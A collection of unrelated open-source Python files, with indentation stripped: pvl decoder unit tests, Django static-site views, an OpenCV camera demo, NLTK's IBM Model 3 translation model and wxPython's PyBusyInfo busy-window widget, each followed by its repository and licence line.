thread.daemon = True # Don't let receiver thread prevent termination
thread.start()
return thread
# ==== api/code/src/main/python/stomp/connect.py | StratusLab/client | apache-2.0 ====
import warnings
from . import utils
from . import timeseries
from . import pos
from . import txn
from .tears import * # noqa
from .plotting import * # noqa
try:
from . import bayesian
except ImportError:
warnings.warn(
"Could not import bayesian submodule due to missing pymc3 dependency.",
ImportWarning)
__version__ = '0.1'
__all__ = ['utils', 'timeseries', 'pos', 'txn', 'bayesian']
# ==== pyfolio/__init__.py | dursk/pyfolio | apache-2.0 ====
#!/usr/bin/env python
"""This module has tests for the pvl decoder functions."""
# Copyright 2019-2021, Ross A. Beyer ([email protected])
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import datetime
import itertools
import unittest
from decimal import Decimal
from pvl.decoder import PVLDecoder, ODLDecoder, PDSLabelDecoder, for_try_except
from pvl.collections import Quantity
class TestForTryExcept(unittest.TestCase):
def test_for_try_except(self):
self.assertEqual(
5, for_try_except(ValueError, int, ("frank", "7.7", "5"))
)
self.assertRaises(
ValueError, for_try_except, ValueError, int, ("frank", "7.7", "a")
)
self.assertEqual(
datetime.date(2001, 1, 1),
for_try_except(
ValueError,
datetime.datetime.strptime,
itertools.repeat("2001-001"),
("%Y-%m-%d", "%Y-%j"),
).date(),
)
class TestDecoder(unittest.TestCase):
def setUp(self):
self.d = PVLDecoder()
def test_decode_quoted_string(self):
self.assertEqual("Quoted", self.d.decode_quoted_string('"Quoted"'))
self.assertEqual(
'He said, "hello"',
self.d.decode_quoted_string("""'He said, "hello"'"""),
)
self.assertEqual(
'She said, \\"bye\\"',
self.d.decode_quoted_string(r"'She said, \"bye\"'"),
)
self.assertEqual(
"No\\tin Python", self.d.decode_quoted_string(r"'No\tin Python'")
)
self.assertEqual(
"Line -\n Continued",
self.d.decode_quoted_string("'Line -\n Continued'"),
)
# print(self.d.decode_quoted_string("""'mixed"\\'quotes'"""))
def test_decode_unquoted_string(self):
self.assertEqual("Unquoted", self.d.decode_unquoted_string("Unquoted"))
for s in (
'hhhhh"hello"',
"Reserved=",
"No\tin Python",
"Line -\n Continued",
):
with self.subTest(string=s):
self.assertRaises(ValueError, self.d.decode_unquoted_string, s)
def test_decode_decimal(self):
for p in (
("125", 125),
("+211109", 211109),
("-79", -79), # Integers
("69.35", 69.35),
("+12456.345", 12456.345),
("-0.23456", -0.23456),
(".05", 0.05),
("-7.", -7), # Floating
("-2.345678E12", -2345678000000.0),
("1.567E-10", 1.567e-10),
("+4.99E+3", 4990.0), # Exponential
):
with self.subTest(pair=p):
self.assertEqual(p[1], self.d.decode_decimal(p[0]))
for s in ("2#0101#", "frank"):
with self.subTest(string=s):
self.assertRaises(ValueError, self.d.decode_decimal, s)
def test_decode_withDecimal(self):
d = PVLDecoder(real_cls=Decimal)
s = "123.450"
self.assertEqual(d.decode_decimal(s), Decimal(s))
self.assertRaises(ValueError, d.decode_decimal, "fruit")
def test_decode_non_decimal(self):
for p in (
("2#0101#", 5),
("+2#0101#", 5),
("-2#0101#", -5), # Binary
("8#0107#", 71),
("+8#0156#", 110),
("-8#0134#", -92), # Octal
("16#100A#", 4106),
("+16#23Bc#", 9148),
("-16#98ef#", -39151), # Hex
):
with self.subTest(pair=p):
self.assertEqual(p[1], self.d.decode_non_decimal(p[0]))
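# The PVL non-decimal notation exercised above is [sign]radix#digits#,
# e.g. 16#100A# == 0x100A == 4106, with an optional leading + or -.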
def test_decode_datetime(self):
utc = datetime.timezone.utc
for p in (
("2001-01-01", datetime.date(2001, 1, 1)),
("2001-027", datetime.date(2001, 1, 27)),
("2001-027Z", datetime.date(2001, 1, 27)),
("23:45", datetime.time(23, 45, tzinfo=utc)),
("01:42:57", datetime.time(1, 42, 57, tzinfo=utc)),
("12:34:56.789", datetime.time(12, 34, 56, 789000, tzinfo=utc)),
(
"2001-027T23:45",
datetime.datetime(2001, 1, 27, 23, 45, tzinfo=utc),
),
(
"2001-01-01T01:34Z",
datetime.datetime(2001, 1, 1, 1, 34, tzinfo=utc),
),
("01:42:57Z", datetime.time(1, 42, 57, tzinfo=utc)),
("2001-12-31T01:59:60.123Z", "2001-12-31T01:59:60.123Z"),
("2001-12-31T01:59:60.123456789", "2001-12-31T01:59:60.123456789"),
("01:00:60", "01:00:60"),
):
with self.subTest(pair=p):
self.assertEqual(p[1], self.d.decode_datetime(p[0]))
self.assertRaises(ValueError, self.d.decode_datetime, "frank")
fancy = "2001-001T01:10:39+7"
self.assertRaises(ValueError, self.d.decode_datetime, fancy)
def test_decode_simple_value(self):
for p in (
("2001-01-01", datetime.date(2001, 1, 1)),
("2#0101#", 5),
("-79", -79),
("Unquoted", "Unquoted"),
('"Quoted"', "Quoted"),
("Null", None),
("TRUE", True),
("false", False),
):
with self.subTest(pair=p):
self.assertEqual(p[1], self.d.decode_simple_value(p[0]))
def test_decode_quantity(self):
q = self.d.decode_quantity("15", "m/s")
self.assertEqual(q, Quantity("15", "m/s"))
try:
from astropy import units as u
d = PVLDecoder(quantity_cls=u.Quantity)
q = d.decode_quantity("15", "m/s")
self.assertEqual(q, u.Quantity("15", "m/s"))
except ImportError: # astropy isn't available.
pass
try:
from pint import Quantity as pintquant
d = PVLDecoder(quantity_cls=pintquant)
q = d.decode_quantity("15", "m/s")
self.assertEqual(q, pintquant("15", "m/s"))
except ImportError: # pint isn't available.
pass
class TestODLDecoder(unittest.TestCase):
def setUp(self):
self.d = ODLDecoder()
def test_decode_datetime(self):
utc = datetime.timezone.utc
for p in (
("1990-07-04", datetime.date(1990, 7, 4)),
("1990-158", datetime.date(1990, 6, 7)),
("2001-001", datetime.date(2001, 1, 1)),
("2001-01-01", datetime.date(2001, 1, 1)),
("12:00", datetime.time(12)),
("12:00:45", datetime.time(12, 0, 45)),
(
"12:00:45.4571",
datetime.time(12, 0, 45, 457100),
),
("15:24:12Z", datetime.time(15, 24, 12, tzinfo=utc)),
("1990-07-04T12:00", datetime.datetime(1990, 7, 4, 12)),
(
"1990-158T15:24:12Z",
datetime.datetime(1990, 6, 7, 15, 24, 12, tzinfo=utc),
),
):
with self.subTest(pair=p):
self.assertEqual(p[1], self.d.decode_datetime(p[0]))
self.assertRaises(ValueError, self.d.decode_datetime, "01:00:60")
try:
from dateutil import tz
tz_plus_7 = tz.tzoffset("+7", datetime.timedelta(hours=7))
for p in (
("01:12:22+07", datetime.time(1, 12, 22, tzinfo=tz_plus_7)),
("01:12:22+7", datetime.time(1, 12, 22, tzinfo=tz_plus_7)),
(
"01:10:39.4575+07",
datetime.time(1, 10, 39, 457500, tzinfo=tz_plus_7),
),
(
"2001-001T01:10:39+7",
datetime.datetime(2001, 1, 1, 1, 10, 39, tzinfo=tz_plus_7),
),
(
"2001-001T01:10:39.457591+7",
datetime.datetime(
2001, 1, 1, 1, 10, 39, 457591, tzinfo=tz_plus_7
),
),
):
with self.subTest(pair=p):
self.assertEqual(p[1], self.d.decode_datetime(p[0]))
except ImportError: # dateutil isn't available.
pass
class TestPDS3Decoder(unittest.TestCase):
def setUp(self):
self.d = PDSLabelDecoder()
def test_decode_datetime(self):
utc = datetime.timezone.utc
for p in (
("1990-07-04", datetime.date(1990, 7, 4)),
("1990-158", datetime.date(1990, 6, 7)),
("2001-001", datetime.date(2001, 1, 1)),
("2001-01-01", datetime.date(2001, 1, 1)),
("12:00", datetime.time(12, tzinfo=utc)),
("12:00:45", datetime.time(12, 0, 45, tzinfo=utc)),
("15:24:12Z", datetime.time(15, 24, 12, tzinfo=utc)),
(
"1990-158T15:24:12Z",
datetime.datetime(1990, 6, 7, 15, 24, 12, tzinfo=utc)),
(
"12:00:45.457",
datetime.time(12, 0, 45, 457000, tzinfo=utc),
),
(
"1990-07-04T12:00",
datetime.datetime(1990, 7, 4, 12, tzinfo=utc),
),
):
with self.subTest(pair=p):
self.assertEqual(p[1], self.d.decode_datetime(p[0]))
for t in (
"01:12:22+07",
"01:12:22+7",
"01:10:39.4575+07",
"2001-001T01:10:39+7",
"2001-001T01:10:39.457591+7",
"2001-001T01:10:39.457591",
):
with self.subTest(time=t):
self.assertRaises(ValueError, self.d.decode_datetime, t)
# ==== tests/test_decoder.py | planetarypy/pvl | bsd-3-clause ====
from django.core.urlresolvers import reverse
from bakery.views import BuildableDetailView, BuildableListView
from core.views import get_build_path
from .models import BirthCertificate
class ListView(BuildableListView):
def __init__(self, **kwargs):
super(ListView, self).__init__(**kwargs)
ListView.build_path = get_build_path('bcs:list', 'index.html')
template_name = 'bcs/list.html'
context_object_name = 'list'
def get_queryset(self):
""" Return the documents ordered by location name"""
return BirthCertificate.objects.order_by('location')
class DetailView(BuildableDetailView):
model = BirthCertificate
template_name = 'bcs/detail.html'
context_object_name = 'bc'
def get_url(self, obj):
return reverse('bcs:detail', kwargs={'pk': obj.pk})
# ==== bcs/views.py | ginabythebay/iddocs | apache-2.0 ====
import numpy
import cv2
import time
print "Starting demo"
frameTimerDuration = 1
# This is the desired resolution of the Pi camera
resolution = (320, 240)
# This is the desired maximum framerate, 0 for maximum possible throughput
framerate = 0
# These are the resolution of the output display, set these
displayWidth = 32.0
displayHeight = 16.0
# These are the horizontal margins of the input feed to crop, everything else scales to fit these
xLeft = 150
xRight = 150
# Open cam, decode image, show in window
cap = cv2.VideoCapture(0) # use 1 or 2 or ... for other camera
success, img = cap.read()
resolution = (len(img[0]), len(img))
print "input resolution is %d,%d" % resolution
print "target resolution is %d,%d" % (displayWidth, displayHeight)
cv2.namedWindow("Original")
cv2.namedWindow("Cropped")
cv2.namedWindow("Downsampled")
cv2.namedWindow("Equalized")
cv2.namedWindow("Contrast")
_displayAspectRatio = displayHeight / displayWidth
print "aspect ratio %f" % _displayAspectRatio
_xMin = xLeft
_xMax = resolution[0]-xRight
_width = _xMax+1 - _xMin
_height = int(_displayAspectRatio * _width)
_yMin = int((resolution[1] - _height)/2)
_yMax = _yMin + _height
print "min = %d, max = %d, height = %d" % (_yMin, _yMax, _height)
downsampleXFactor = displayWidth / _width
downsampleYFactor = displayHeight / _height
print "Crop to (%d,%d)=%d:(%d,%d)=%d" % (_xMin,_xMax,(_xMax-_xMin),_yMin,_yMax,(_yMax-_yMin))
print "Scaling by (x,y) %f, %f" % (downsampleXFactor, downsampleYFactor)
print "Scales to (%d,%d)" % (_width*downsampleXFactor,_height*downsampleYFactor)
def get_brightness(img):
hsv = cv2.cvtColor(img, cv2.COLOR_RGB2HSV)
averageBrightness = int(cv2.mean(hsv[:,:,2])[0])
return bytearray(format(averageBrightness,'05d'))
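# Sketch: an average V (value) of 137 comes back as bytearray(b'00137'), a
# fixed-width form that is easy to stream to an external display controller.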
def equalize_brightness(img):
hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)
hsv[:,:,2] = cv2.equalizeHist(hsv[:,:,2])
img = cv2.cvtColor(hsv, cv2.COLOR_HSV2BGR)
return img
def equalize_hist(img):
for c in xrange(0, 3): # equalize all three channels; xrange(0, 2) skipped channel 2
img[:,:,c] = cv2.equalizeHist(img[:,:,c])
return img
frameTimer = time.time() + frameTimerDuration
frameCounter = 0
try:
key = -1
while(key < 0):
success, img = cap.read()
frameCounter += 1
if time.time() > frameTimer:
print "processed %d frames in %f seconds" % (frameCounter, frameTimerDuration)
frameCounter = 0
frameTimer = time.time() + frameTimerDuration
brightness = get_brightness(img)
print "Brightness " + brightness
cropImg = img[_yMin:_yMax,_xMin:_xMax]
smallImg = cv2.resize(cropImg, (0,0), fx=downsampleXFactor, fy=downsampleYFactor)
equalizedImg = numpy.copy(cropImg)
contrastImg = numpy.copy(cropImg)
equalize_hist(equalizedImg)
contrastImg = equalize_brightness(contrastImg)
cv2.imshow("Original", img)
cv2.imshow("Cropped", cropImg)
cv2.imshow("Downsampled", smallImg)
cv2.imshow("Equalized", equalizedImg)
cv2.imshow("Contrast", contrastImg)
key = cv2.waitKey(1)
except KeyboardInterrupt as e:
print "Interrupted"
cap.release() # a VideoCapture is released, not closed; 'stream' and 'camera' were never defined here
cv2.destroyAllWindows()
# ==== frameprocessordemo.py | raygeeknyc/skinner | gpl-3.0 ====
# -*- coding: utf-8 -*-
# Natural Language Toolkit: IBM Model 3
#
# Copyright (C) 2001-2013 NLTK Project
# Authors: Chin Yee Lee, Hengfeng Li, Ruxin Hou, Calvin Tanujaya Lim
# URL: <http://nltk.org/>
# For license information, see LICENSE.TXT
"""
Translation model that considers how a word can be aligned to
multiple words in another language.
IBM Model 3 improves on Model 2 by directly modeling the phenomenon
where a word in one language may be translated into zero or more words
in another. This is expressed by the fertility probability,
n(phi | source word).
If a source word translates into more than one word, it is possible to
generate sentences that have the same alignment in multiple ways. This
is modeled by a distortion step. The distortion probability, d(j|i,l,m),
predicts a target word position, given its aligned source word's
position. The distortion probability replaces the alignment probability
of Model 2.
The fertility probability is not applicable for NULL. Target words that
align to NULL are assumed to be distributed uniformly in the target
sentence. The existence of these words is modeled by p1, the probability
that a target word produced by a real source word requires another
target word that is produced by NULL.
The EM algorithm used in Model 3 is:
E step - In the training data, collect counts, weighted by prior
probabilities.
(a) count how many times a source language word is translated
into a target language word
(b) count how many times a particular position in the target
sentence is aligned to a particular position in the source
sentence
(c) count how many times a source word is aligned to phi number
of target words
(d) count how many times NULL is aligned to a target word
M step - Estimate new probabilities based on the counts from the E step
Because there are too many possible alignments, only the most probable
ones are considered. First, the best alignment is determined using prior
probabilities. Then, a hill climbing approach is used to find other good
candidates.
Notations:
i: Position in the source sentence
Valid values are 0 (for NULL), 1, 2, ..., length of source sentence
j: Position in the target sentence
Valid values are 1, 2, ..., length of target sentence
l: Number of words in the source sentence, excluding NULL
m: Number of words in the target sentence
s: A word in the source language
t: A word in the target language
phi: Fertility, the number of target words produced by a source word
p1: Probability that a target word produced by a source word is
accompanied by another target word that is aligned to NULL
p0: 1 - p1
References:
Philipp Koehn. 2010. Statistical Machine Translation.
Cambridge University Press, New York.
Peter E Brown, Stephen A. Della Pietra, Vincent J. Della Pietra, and
Robert L. Mercer. 1993. The Mathematics of Statistical Machine
Translation: Parameter Estimation. Computational Linguistics, 19 (2),
263-311.
"""
from __future__ import division
from collections import defaultdict
from math import factorial
from nltk.translate import AlignedSent
from nltk.translate import Alignment
from nltk.translate import IBMModel
from nltk.translate import IBMModel2
from nltk.translate.ibm_model import Counts
import warnings
class IBMModel3(IBMModel):
"""
Translation model that considers how a word can be aligned to
multiple words in another language
>>> bitext = []
>>> bitext.append(AlignedSent(['klein', 'ist', 'das', 'haus'], ['the', 'house', 'is', 'small']))
>>> bitext.append(AlignedSent(['das', 'haus', 'war', 'ja', 'groß'], ['the', 'house', 'was', 'big']))
>>> bitext.append(AlignedSent(['das', 'buch', 'ist', 'ja', 'klein'], ['the', 'book', 'is', 'small']))
>>> bitext.append(AlignedSent(['ein', 'haus', 'ist', 'klein'], ['a', 'house', 'is', 'small']))
>>> bitext.append(AlignedSent(['das', 'haus'], ['the', 'house']))
>>> bitext.append(AlignedSent(['das', 'buch'], ['the', 'book']))
>>> bitext.append(AlignedSent(['ein', 'buch'], ['a', 'book']))
>>> bitext.append(AlignedSent(['ich', 'fasse', 'das', 'buch', 'zusammen'], ['i', 'summarize', 'the', 'book']))
>>> bitext.append(AlignedSent(['fasse', 'zusammen'], ['summarize']))
>>> ibm3 = IBMModel3(bitext, 5)
>>> print(round(ibm3.translation_table['buch']['book'], 3))
1.0
>>> print(round(ibm3.translation_table['das']['book'], 3))
0.0
>>> print(round(ibm3.translation_table['ja'][None], 3))
1.0
>>> print(round(ibm3.distortion_table[1][1][2][2], 3))
1.0
>>> print(round(ibm3.distortion_table[1][2][2][2], 3))
0.0
>>> print(round(ibm3.distortion_table[2][2][4][5], 3))
0.75
>>> print(round(ibm3.fertility_table[2]['summarize'], 3))
1.0
>>> print(round(ibm3.fertility_table[1]['book'], 3))
1.0
>>> print(ibm3.p1)
0.054...
>>> test_sentence = bitext[2]
>>> test_sentence.words
['das', 'buch', 'ist', 'ja', 'klein']
>>> test_sentence.mots
['the', 'book', 'is', 'small']
>>> test_sentence.alignment
Alignment([(0, 0), (1, 1), (2, 2), (3, None), (4, 3)])
"""
def __init__(self, sentence_aligned_corpus, iterations,
probability_tables=None):
"""
Train on ``sentence_aligned_corpus`` and create a lexical
translation model, a distortion model, a fertility model, and a
model for generating NULL-aligned words.
Translation direction is from ``AlignedSent.mots`` to
``AlignedSent.words``.
:param sentence_aligned_corpus: Sentence-aligned parallel corpus
:type sentence_aligned_corpus: list(AlignedSent)
:param iterations: Number of iterations to run training algorithm
:type iterations: int
:param probability_tables: Optional. Use this to pass in custom
probability values. If not specified, probabilities will be
set to a uniform distribution, or some other sensible value.
If specified, all the following entries must be present:
``translation_table``, ``alignment_table``,
``fertility_table``, ``p1``, ``distortion_table``.
See ``IBMModel`` for the type and purpose of these tables.
:type probability_tables: dict[str]: object
"""
super(IBMModel3, self).__init__(sentence_aligned_corpus)
self.reset_probabilities()
if probability_tables is None:
# Get translation and alignment probabilities from IBM Model 2
ibm2 = IBMModel2(sentence_aligned_corpus, iterations)
self.translation_table = ibm2.translation_table
self.alignment_table = ibm2.alignment_table
self.set_uniform_probabilities(sentence_aligned_corpus)
else:
# Set user-defined probabilities
self.translation_table = probability_tables['translation_table']
self.alignment_table = probability_tables['alignment_table']
self.fertility_table = probability_tables['fertility_table']
self.p1 = probability_tables['p1']
self.distortion_table = probability_tables['distortion_table']
for n in range(0, iterations):
self.train(sentence_aligned_corpus)
def reset_probabilities(self):
super(IBMModel3, self).reset_probabilities()
self.distortion_table = defaultdict(
lambda: defaultdict(lambda: defaultdict(lambda: defaultdict(
lambda: self.MIN_PROB))))
"""
dict[int][int][int][int]: float. Probability(j | i,l,m).
Values accessed as ``distortion_table[j][i][l][m]``.
"""
def set_uniform_probabilities(self, sentence_aligned_corpus):
# d(j | i,l,m) = 1 / m for all i, j, l, m
l_m_combinations = set()
for aligned_sentence in sentence_aligned_corpus:
l = len(aligned_sentence.mots)
m = len(aligned_sentence.words)
if (l, m) not in l_m_combinations:
l_m_combinations.add((l, m))
initial_prob = 1 / float(m)
if initial_prob < IBMModel.MIN_PROB:
warnings.warn("A target sentence is too long (" + str(m) +
" words). Results may be less accurate.")
for j in range(1, m + 1):
for i in range(0, l + 1):
self.distortion_table[j][i][l][m] = initial_prob
# simple initialization, taken from GIZA++
self.fertility_table[0] = defaultdict(lambda: 0.2)
self.fertility_table[1] = defaultdict(lambda: 0.65)
self.fertility_table[2] = defaultdict(lambda: 0.1)
self.fertility_table[3] = defaultdict(lambda: 0.04)
MAX_FERTILITY = 10
initial_fert_prob = 0.01 / (MAX_FERTILITY - 4)
for phi in range(4, MAX_FERTILITY):
self.fertility_table[phi] = defaultdict(lambda: initial_fert_prob)
self.p1 = 0.5
def train(self, parallel_corpus):
counts = Model3Counts()
for aligned_sentence in parallel_corpus:
l = len(aligned_sentence.mots)
m = len(aligned_sentence.words)
# Sample the alignment space
sampled_alignments, best_alignment = self.sample(aligned_sentence)
# Record the most probable alignment
aligned_sentence.alignment = Alignment(
best_alignment.zero_indexed_alignment())
# E step (a): Compute normalization factors to weigh counts
total_count = self.prob_of_alignments(sampled_alignments)
# E step (b): Collect counts
for alignment_info in sampled_alignments:
count = self.prob_t_a_given_s(alignment_info)
normalized_count = count / total_count
for j in range(1, m + 1):
counts.update_lexical_translation(
normalized_count, alignment_info, j)
counts.update_distortion(
normalized_count, alignment_info, j, l, m)
counts.update_null_generation(normalized_count, alignment_info)
counts.update_fertility(normalized_count, alignment_info)
# M step: Update probabilities with maximum likelihood estimates
# If any probability is less than MIN_PROB, clamp it to MIN_PROB
existing_alignment_table = self.alignment_table
self.reset_probabilities()
self.alignment_table = existing_alignment_table # don't retrain
self.maximize_lexical_translation_probabilities(counts)
self.maximize_distortion_probabilities(counts)
self.maximize_fertility_probabilities(counts)
self.maximize_null_generation_probabilities(counts)
def maximize_distortion_probabilities(self, counts):
MIN_PROB = IBMModel.MIN_PROB
for j, i_s in counts.distortion.items():
for i, src_sentence_lengths in i_s.items():
for l, trg_sentence_lengths in src_sentence_lengths.items():
for m in trg_sentence_lengths:
estimate = (counts.distortion[j][i][l][m] /
counts.distortion_for_any_j[i][l][m])
self.distortion_table[j][i][l][m] = max(estimate,
MIN_PROB)
def prob_t_a_given_s(self, alignment_info):
"""
Probability of target sentence and an alignment given the
source sentence
"""
src_sentence = alignment_info.src_sentence
trg_sentence = alignment_info.trg_sentence
l = len(src_sentence) - 1 # exclude NULL
m = len(trg_sentence) - 1
p1 = self.p1
p0 = 1 - p1
probability = 1.0
MIN_PROB = IBMModel.MIN_PROB
# Combine NULL insertion probability
null_fertility = alignment_info.fertility_of_i(0)
probability *= (pow(p1, null_fertility) *
pow(p0, m - 2 * null_fertility))
if probability < MIN_PROB:
return MIN_PROB
# Compute combination (m - null_fertility) choose null_fertility
for i in range(1, null_fertility + 1):
probability *= (m - null_fertility - i + 1) / i
if probability < MIN_PROB:
return MIN_PROB
# Combine fertility probabilities
for i in range(1, l + 1):
fertility = alignment_info.fertility_of_i(i)
probability *= (factorial(fertility) *
self.fertility_table[fertility][src_sentence[i]])
if probability < MIN_PROB:
return MIN_PROB
# Combine lexical and distortion probabilities
for j in range(1, m + 1):
t = trg_sentence[j]
i = alignment_info.alignment[j]
s = src_sentence[i]
probability *= (self.translation_table[t][s] *
self.distortion_table[j][i][l][m])
if probability < MIN_PROB:
return MIN_PROB
return probability
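# The running product above is the closed-form Model 3 likelihood
# (Brown et al. 1993), with phi_0 the NULL fertility:
#
# P(t, a | s) = C(m - phi_0, phi_0) * p1^phi_0 * p0^(m - 2*phi_0)
# * prod_{i=1..l} phi_i! * n(phi_i | s_i)
# * prod_{j=1..m} t(t_j | s_a(j)) * d(j | a(j), l, m)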
class Model3Counts(Counts):
"""
Data object to store counts of various parameters during training.
Includes counts for distortion.
"""
def __init__(self):
super(Model3Counts, self).__init__()
self.distortion = defaultdict(
lambda: defaultdict(lambda: defaultdict(lambda: defaultdict(
lambda: 0.0))))
self.distortion_for_any_j = defaultdict(
lambda: defaultdict(lambda: defaultdict(lambda: 0.0)))
def update_distortion(self, count, alignment_info, j, l, m):
i = alignment_info.alignment[j]
self.distortion[j][i][l][m] += count
self.distortion_for_any_j[i][l][m] += count
# ==== model/lib/nltk/translate/ibm3.py | nelango/ViralityAnalysis | mit ====
"""
:class:`PyBusyInfo` constructs a busy info window and displays a message in it.
Description
===========
:class:`PyBusyInfo` constructs a busy info window and displays a message in it.
This class makes it easy to tell your user that the program is temporarily busy.
Just create a :class:`PyBusyInfo` object, and within the current scope, a message window
will be shown.
For example::
busy = PyBusyInfo("Please wait, working...")
for i in xrange(10000):
DoACalculation()
del busy
It works by creating a window in the constructor, and deleting it in the destructor.
You may also want to call :func:`Yield` () to refresh the window periodically (in case
it had been obscured by other windows, for example).
Usage
=====
Usage example::
import wx
import wx.lib.agw.pybusyinfo as PBI
class MyFrame(wx.Frame):
def __init__(self, parent):
wx.Frame.__init__(self, parent, -1, "PyBusyInfo Demo")
panel = wx.Panel(self)
b = wx.Button(panel, -1, "Test PyBusyInfo ", (50,50))
self.Bind(wx.EVT_BUTTON, self.OnButton, b)
def OnButton(self, event):
message = "Please wait 5 seconds, working..."
busy = PBI.PyBusyInfo(message, parent=self, title="Really Busy")
wx.Yield()
for indx in xrange(5):
wx.MilliSleep(1000)
del busy
# our normal wxApp-derived class, as usual
app = wx.App(0)
frame = MyFrame(None)
app.SetTopWindow(frame)
frame.Show()
app.MainLoop()
Supported Platforms
===================
:class:`PyBusyInfo` has been tested on the following platforms:
* Windows (Windows XP).
Window Styles
=============
`No particular window styles are available for this class.`
Events Processing
=================
`No custom events are available for this class.`
License And Version
===================
:class:`PyBusyInfo` is distributed under the wxPython license.
Latest Revision: Andrea Gavana @ 20 Mar 2012, 21.00 GMT
Version 0.2
"""
# Version Info
__version__ = "0.2"
import wx
_ = wx.GetTranslation
class PyInfoFrame(wx.Frame):
""" Base class for :class:`PyBusyInfo`. """
def __init__(self, parent, message, title, icon):
"""
Default class constructor.
:param `parent`: the frame parent;
:param `message`: the message to display in the :class:`PyBusyInfo`;
:param `title`: the main :class:`PyBusyInfo` title;
:param `icon`: an icon to draw as the frame icon, an instance of :class:`Bitmap`.
"""
wx.Frame.__init__(self, parent, wx.ID_ANY, title, wx.DefaultPosition,
wx.DefaultSize, wx.NO_BORDER|wx.FRAME_TOOL_WINDOW|wx.FRAME_SHAPED|wx.STAY_ON_TOP)
panel = wx.Panel(self)
panel.SetCursor(wx.HOURGLASS_CURSOR)
self._message = message
self._title = title
self._icon = icon
dc = wx.ClientDC(self)
textWidth, textHeight, dummy = dc.GetMultiLineTextExtent(self._message)
sizeText = wx.Size(textWidth, textHeight)
self.SetClientSize((max(sizeText.x, 340) + 60, max(sizeText.y, 40) + 60))
# need to size the panel correctly first so that text.Centre() works
panel.SetSize(self.GetClientSize())
# Bind the events to draw ourselves
panel.Bind(wx.EVT_PAINT, self.OnPaint)
panel.Bind(wx.EVT_ERASE_BACKGROUND, self.OnErase)
self.Centre(wx.BOTH)
# Create a non-rectangular region to set the frame shape
size = self.GetSize()
bmp = wx.EmptyBitmap(size.x, size.y)
dc = wx.BufferedDC(None, bmp)
dc.SetBackground(wx.Brush(wx.Colour(0, 0, 0), wx.SOLID))
dc.Clear()
dc.SetPen(wx.Pen(wx.Colour(0, 0, 0), 1))
dc.DrawRoundedRectangle(0, 0, size.x, size.y, 12)
r = wx.RegionFromBitmapColour(bmp, wx.Colour(0, 0, 0))
# Store the non-rectangular region
self.reg = r
if wx.Platform == "__WXGTK__":
self.Bind(wx.EVT_WINDOW_CREATE, self.SetBusyShape)
else:
self.SetBusyShape()
# Add a custom bitmap at the top (if any)
def SetBusyShape(self, event=None):
"""
Sets :class:`PyInfoFrame` shape using the region created from the bitmap.
:param `event`: a :class:`WindowCreateEvent` event (GTK only, as GTK supports setting
the window shape only during window creation).
"""
self.SetShape(self.reg)
if event:
# GTK only
event.Skip()
def OnPaint(self, event):
"""
Handles the ``wx.EVT_PAINT`` event for :class:`PyInfoFrame`.
:param `event`: a :class:`PaintEvent` to be processed.
"""
panel = event.GetEventObject()
dc = wx.BufferedPaintDC(panel)
dc.Clear()
# Fill the background with a gradient shading
startColour = wx.SystemSettings_GetColour(wx.SYS_COLOUR_ACTIVECAPTION)
endColour = wx.WHITE
rect = panel.GetRect()
dc.GradientFillLinear(rect, startColour, endColour, wx.SOUTH)
# Draw the label
font = wx.SystemSettings_GetFont(wx.SYS_DEFAULT_GUI_FONT)
dc.SetFont(font)
# Draw the message
rect2 = wx.Rect(*rect)
rect2.height += 20
dc.DrawLabel(self._message, rect2, alignment=wx.ALIGN_CENTER) # ALIGN_CENTER already combines both axes
# Draw the top title
font.SetWeight(wx.BOLD)
dc.SetFont(font)
dc.SetPen(wx.Pen(wx.SystemSettings_GetColour(wx.SYS_COLOUR_CAPTIONTEXT)))
dc.SetTextForeground(wx.SystemSettings_GetColour(wx.SYS_COLOUR_CAPTIONTEXT))
if self._icon.IsOk():
iconWidth, iconHeight = self._icon.GetWidth(), self._icon.GetHeight()
dummy, textHeight = dc.GetTextExtent(self._title)
textXPos, textYPos = iconWidth + 10, (iconHeight-textHeight)/2
dc.DrawBitmap(self._icon, 5, 5, True)
else:
textXPos, textYPos = 5, 0
dc.DrawText(self._title, textXPos, textYPos+5)
dc.DrawLine(5, 25, rect.width-5, 25)
size = self.GetSize()
dc.SetPen(wx.Pen(startColour, 1))
dc.SetBrush(wx.TRANSPARENT_BRUSH)
dc.DrawRoundedRectangle(0, 0, size.x, size.y-1, 12)
def OnErase(self, event):
"""
Handles the ``wx.EVT_ERASE_BACKGROUND`` event for :class:`PyInfoFrame`.
:param `event`: a :class:`EraseEvent` event to be processed.
:note: This method is intentionally empty to reduce flicker.
"""
# This is empty on purpose, to avoid flickering
pass
# -------------------------------------------------------------------- #
# The actual PyBusyInfo implementation
# -------------------------------------------------------------------- #
class PyBusyInfo(object):
"""
Constructs a busy info window as child of parent and displays a message in it.
"""
def __init__(self, message, parent=None, title=_("Busy"), icon=wx.NullBitmap):
"""
Default class constructor.
:param `parent`: the :class:`PyBusyInfo` parent;
:param `message`: the message to display in the :class:`PyBusyInfo`;
:param `title`: the main :class:`PyBusyInfo` title;
:param `icon`: an icon to draw as the frame icon, an instance of :class:`Bitmap`.
:note: If `parent` is not ``None`` you must ensure that it is not closed
while the busy info is shown.
"""
self._infoFrame = PyInfoFrame(parent, message, title, icon)
if parent and parent.HasFlag(wx.STAY_ON_TOP):
# we must have this flag to be in front of our parent if it has it
self._infoFrame.SetWindowStyleFlag(wx.STAY_ON_TOP)
# Added for the screenshot-taking tool
self.Show()
def __del__(self):
""" Overloaded method, for compatibility with wxWidgets. """
self._infoFrame.Show(False)
self._infoFrame.Destroy()
def Show(self, show=True):
"""
Shows or hides the window.
You may need to call `Raise` for a top level window if you want to bring it to
top, although this is not needed if :meth:`PyBusyInfo.Show` is called immediately after the frame creation.
:param bool `show`: ``True`` to show the :class:`PyBusyInfo` frame, ``False`` to hide it.
:return: ``True`` if the window has been shown or hidden or ``False`` if nothing was done
because it already was in the requested state.
.. note::
Notice that the default state of newly created top level windows is hidden (to allow
you to create their contents without flicker) unlike for all the other, not derived from
:class:`TopLevelWindow`, windows that are by default created in the shown state.
.. versionadded:: 0.9.5
"""
retVal = self._infoFrame.Show(show)
if show:
self._infoFrame.Refresh()
self._infoFrame.Update()
return retVal
